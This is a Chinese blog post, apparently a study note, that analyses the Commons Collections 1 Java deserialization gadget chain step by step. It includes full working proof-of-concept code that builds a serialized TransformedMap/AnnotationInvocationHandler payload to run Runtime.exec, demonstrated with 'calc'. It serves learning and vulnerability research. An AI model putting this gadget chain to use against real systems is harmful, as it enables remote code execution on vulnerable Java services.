cc1学习

已于 2022-10-30 21:26:08 修改
阅读量1.9k 收藏 2
点赞数 1
分类专栏: Java安全 文章标签: web安全
于 2022-04-24 21:49:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45677784/article/details/124391720
版权

前言:

本文主要记录学习cc1的过程,cc1是第一条也是最经典的一条利用链,后面几条利用链也是基本多多少少利用了这条链子,刚接触javacc链,过程中有错误理解不对的地方,欢迎师傅们指正

分析过程:

先简单提一下利用链是怎么形成的,也便我们好寻找

org.apache.commons.collections.functors Commons Collections 自定义的一组功能类

这组功能类里面有个 ConstantTransformer.java 是一个转换器,里面定义了一个 transform 方法,接收一个对象,并完整输出,也就是说可以从这里来入手

然后我们重点关注下 InvokerTransformer.java 因为里面的 transform 函数 接收一个对象,然后经过反射调用,方法值参数类型参数全部可控制,这里是链子的触发点,最终程序执行流会在这里触发我们想要的结果

 

构造利用链

构造payload看下InvokerTransformer的transform能不能用

按照 InvokerTransformer 给出的写法构造利用payload,这里先给runtme实例化为对象r,然后按照InvokerTransformer函数给出的类型填写方法,参数值等,最后调用transform执行前面实例化的 对象r执行calc

import org.apache.commons.collections.functors.InvokerTransformer;

public class CC1 {
    public static void main(String[] args) throws Exception {
        Runtime r = Runtime.getRuntime();

        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(r);

    }

这里是成功的执行了calc

 寻找利用链

下面就去找有哪些类调用了 transform 方法,共有21个类调用了这个方法。主要去找不同名字的类调用transform 的方法

 重点关注 TransformedMap 类,因为里面三处函数调用了transform方法

进入 checkSetValue 方法,可以看到checkSetValue 函数调用了 valueTransformer 的 transform 方法,然后还需要找下checkSetValue 方法被哪里调用了

再来看下 valueTransformer 值是怎么传递过来的,它的函数修饰符是 protected 也就是说它会被自己调用 

接着简单分析下,这里实现了一个构造器 TransformedMap函数,super() 是 AbstractInputCheckedMapDecorator 这个父类里面定义的,用来包装函数用的,剩下两个参数是一个键值对

看到修饰符是一个受保护的方法,所以要找谁调用了它,向上看有一个 decorate 函数 是个静态方法,调用TransformedMap函数简单分析下是对传进来的值进行转换封装

也就是说只要调用 TransformedMap的decorate 方法就可以走到TransformedMap方法处。可以看到只有一处调用了checkSetValue ,进去看到其实是 TransformedMap 的父类

里面定义了一个MapEntry类,这个类里面的setValue 方法调用了checkSetValue方法,值也是可控的,接下来需要找一下哪个readObject类里面调用了setValue

右键setValue可以看到刚好在 AnnotationInvocationHandler 类的readObject方法里有一个遍历数组的功能,并且调用了setValue,但是有一个if,下面再说怎么绕先进到这个类里

进到这个类里从构造函数和接受的参数来看,此类没有修饰符默认为default需要用反射来获取,然后接收了两个参数,第一个是注解,第二个值也是可控的,直接map传进去一个对象就可以调用

再回来看一下readObject方法,由于runtime没有继承serialize接口所以不能反序列化,之后看到if那里还需要满足两个条件才能执行到setValue方法,不过没关系

这里可以通过反射来调用Runtime,来解决不能序列化的问题,因为没有继承Serializable接口

再来调试一下,下断点可以看到,程序在进入 if 时值是空的,这段代码的意思是判断memberValue里是否具有成员方法,没有就跳出程序

所以说只需要覆写注解里面的target的value即可实现绕过

具体实现

然后程序执行到下面会将valueTransformer.transform(value)里面的vualue改成AnnotationTypeMismatchExceptionProxy,绕过它也很简单其实还有一个ConstantTransformer类,这里可以通过调用它的transform来反射调用Runtime

具体实现

至此这条链子算是找完了,接下来开始构造链子

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.io.IOException;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.io.FileOutputStream;
import java.util.HashMap;
import java.util.Map;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.FileInputStream;

public class CC1 {
    public static void main(String[] args) throws Exception {
        
        Transformer[] transformers = new Transformer[]{ 
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);   

        HashMap<Object, Object> map = new HashMap<>();  
        map.put("value","ccc");
        Map<Object, Object> transformedMap = TransformedMap.decorate(map,null,chainedTransformer);  
        
        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");  
        Constructor annotationInvocationdhlConstructor = c.getDeclaredConstructor(Class.class,Map.class);    
        annotationInvocationdhlConstructor.setAccessible(true); 
        Object o = annotationInvocationdhlConstructor.newInstance(Target.class, transformedMap); 

        serialize(o);
        unserialize("ser.bin");
    }
    
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}

执行一下试试,成功弹出计算器

总结:

执行流程

写的比较细,师傅们可以下断点调试一下,如果有错的地方欢迎指出

ConstantTransformer().transform()

InvokerTransformer().transform()

TransformedMap().decorate().TransformedMap

AbstractInputCheckedMapDecorator().entrySet().next().MapEntry()

AnnotationInvocationHandler().readObject().setValue()

TransformedMap().checkSetValue()

InvokerTransformer().transform().getMethod().invoke().exec()

最后transformedmap相对ysoserial里的那条cc1来说还是比较容易一点,学习完收益良多

1ighttack
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[linux]LINUX程序设计cc1--入门
sinat_28128937的博客
06-07 2392
在学操作系统和网络时穿插着学过一点LINUX.今天开始系统的从头开始学习一下,教材是《Linxu程序设计》和《Unix环境高级编程》。 第一天: UNIX系统:一种遵循特定规范的计算机系统,定义了所有必需的系统函数的名称、接口、行为。 Linux:一个自由发布的类Unix内核实现,是一个操作系统的底层核心。 GNU的GPL:
CC1 学习总结
AsagiRiAsagi的博客
06-01 533
java反序列化链 cc1 TransformedMap学习记录
Java安全入门(二)——CC链1 分析+详解
热门推荐
weixin_45808483的博客
01-29 1万+
背景 在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java反序列化和Apache Commons Collections这一基础类库实现远程命令执行的真实案例来到人们的视野,各大Java Web Server纷纷躺枪,这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。 从Apache CommonsCollections 说起。 Apache C...
java代码审计之CC1链(一)
st3pby的博客
02-20 3767
InvokerTransformerCC1链的漏洞点位于InvokerTransformer.class中反射加载参数可控那么只需要调用到这个点,就可以触发漏洞,可以参考ysoserial中的CC1利用ysoserial中的CC1链,是使用LazyMap构造的,LazyMap构造的整条攻击路径为。
Java反序列化之CommonsCollections(CC1)基础篇
qq_44029310的博客
11-14 1158
本文包括:Java反序列化之CommonsCollections篇(CC1)的一些基础知识概念。
java反序列之CC1
Go_change的博客
05-09 223
序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,就是将对象转换成另一种形式,以方便跨平台存储和网络传输。反序列化则是将上述过程反过来进行的操作。在Java中任何一个对象必须要实现Serializable接口才可以执行序列化和反序列化操作。
CC1链分析与复现
weixin_42974824的博客
08-16 1443
CC1链分析与复现
CC1链分析
sunyufei_666的博客
06-15 246
第一个是memberType类型不为空值,这里type是传入的Override.class,annotationType.memberTypes()为调用出入class的成员方法,所以,传入的class类中必须存在成员方法,且成员变量的key值必须与map中的key值相同,而Override.class的成员方法为空值,所以这里可以选择Target.class作为参数。这里有两个if,如果这两个if的条件为false时,无法调用里面的setValue方法。
CC1利用链EXP编写之源码分析
yuan_boss的博客
08-14 206
经过查找,可以发现类的setValue()方法中调用了checkSetValue()方法,并且setValue()方法可以传入任意参数类型。
Java安全学习笔记--反序列化利用链CC1链(1)
m0_64685672的博客
01-16 1032
测试环境 jdk1.7(jdk7u80) CommonCellection3.1 预备知识简述 反射 每个类在第一次创建时会生成一个class实例,这个class实例保存着类的所有信息,可以通过: public Field[] getFields(); //返回类的成员方法 public Method[] getMethods(); //返回类的构造方法 public Constructor<T> getConstructor(Class<?>... para
java反序列化CC1
qq_62540010的博客
03-16 405
Java Commons Collections的利用链也被称为cc链,是在学习反序列化漏洞必不可少的一个部分。首先先介绍一下Commons Collection组件,Apache Commons 当中有⼀个组件叫做 Apache Commons Collections ,主要封装了Java 的 Collection(集合) 相关类对象,它提供了很多强有⼒的数据结构类型并且实现了各种集合⼯ 具类。collection是set,list,queue的抽象。
[Java反序列化]CommonsCollections1利用链学习(上)
feng的博客
08-14 759
前言 终于快入门了呜呜呜,开始学习CommonsCollections1的TransformedMap链。 环境 <dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> &l
cc1LazyMap链
weixin_45682070的博客
01-09 914
前言 上一篇文章我们看了Java动态代理的概念,而cc1中的LazyMap链就用到这个概念,现在来做个简单的剖析。 简而言之就是当调用到被代理对象的任何方法时,都会先调用InvocationHandler接口中的invoke方法,而AnnotationInvocationHandler正好实现了该接口。 LazyMap链 首先我们先看一下代码: package org.example.cc; import org.apache.commons.collections.Transformer; import
Java反序列化之CC1链分析
混子
12-17 1万+
可能之前看Java CC1链的文章留下了有阴影把,有TransformedMap玩法,还有Lazymap玩法,最终还得借助AnnotationInvocationHandler或这动态代理,看着就头大,所以拖了一段时间,没办法,最终还是来了,洞一直在更新,我不加快节奏干洞,洞要给我说再见,这就很难受,不闹了,这篇文章主要是CC1链和那两种玩法
Java安全-CC1
qq_64201116的博客
12-04 820
这里用的是组长的链子和yso好像不太一样,不过大体上都是差不多的。后半条的链子都是一样的,而且这条更短更易理解。yso的CC1过段时间再看一下。 ![image.png](https://img-blog.csdnimg.cn/img_convert/64dc7781acc31f532718573001745501.png#averageHue=#2d2c2c&clientId=ud4bee143-b38b-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=66
一文带你搞懂CC1链(小白入门必看文章)
最新发布
maple_leaf
12-03 1997
CC链是利用Java反序列化漏洞进行攻击的一种方式。CC链利用Apache Commons Collections库中的Transformer接口的实现类,通过巧妙的设计,将恶意代码序列化为一个对象,然后将该对象传递给一个反序列化函数,从而触发恶意代码的执行。
Commons Collections利用链
Townmacro的博客
04-04 786
Commons Collections反序列化利用链
未知的服务器标记 “cc1:Editor”
handsometone1982的专栏
04-03 4427
<br />平时用VS2008添加ajaxcontroltoolkit控件时,都不会出现类似标题的错误,然而今天却碰到了。<br /> <br />这几天在修改别人一个项目,需要在一个页面中添加ajaxcontroltoolkit的Editor控件,然而VS2008的工具箱中竟然没有已经添加安装的AJAXCONTROLTOOLKIT的控件。于是打开了另一个已经做好的项目,在该项目中添加了Editor,然后直接将Editor复制到修改的工程中,编译时,出现如题错误。<br /> <br />看了页面的顶部,是
Java安全--CC1的补充和CC6
qq_64201116的博客
12-08 1165
我们看一下两条链子的分歧在哪里:从ChainedTransformer.transform()开始往下和上一次讲的链子是一样的,这里就不赘述了。不一样的是transformer调用的函数从TransformedMap.checkSetValue()变成了LazyMap.get()我们现在的目标是搜索那里调用了get方法-->也是AnnotationInvocationHandler需要利用的点在AnnotationInvocationHandler的invoke()里面,而学完动态代理我们知道Invocat
cc2530学习资料
08-24
对于学习CC2530的资料,我可以提供一些推荐: 1. TI官方文档:您可以访问德州仪器(Texas Instruments)官方网站,下载CC2530的数据手册、用户指南和应用笔记等文档。这些文档详细介绍了CC2530的功能、特性和使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值